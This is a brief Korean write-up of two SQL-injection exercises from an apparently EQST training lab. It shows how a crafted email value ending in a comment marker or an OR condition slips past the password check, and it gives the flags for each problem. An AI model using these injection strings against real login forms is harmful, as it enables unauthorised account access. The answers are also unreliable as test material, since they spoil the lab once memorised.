- 2번

1. 풀이과정
1) select * from members where email='_email_' and password='_passwd_' 와 같이 되어 있다.
2) 현재 이메일에 z_answer@eqst3.com' or 'asdf'='asf를 넣고 비밀번호는 모른다고 할 때, 
select * from members where email='z_answer@eqst3.com' or 'asdf'='asf' and password='1234' 가 된다.
3) 하지만 or/and 필터링이 되어 있기 때문에 주석 처리를 하여 뒤의 쿼리가 실행되지 않도록 했다.
이메일: z_answer@eqst3.com'-- | 비밀번호: 2134

2. 정답
exam_answer_complete

=============================================================================================
- 3번 

1. 풀이과정
1) 위의 방식과 같이 적용했을 때, or 문을 사용해 뒤의 패스워드를 몰라도 참이 되도록 했다.
2. 정답
eqst_answerexam
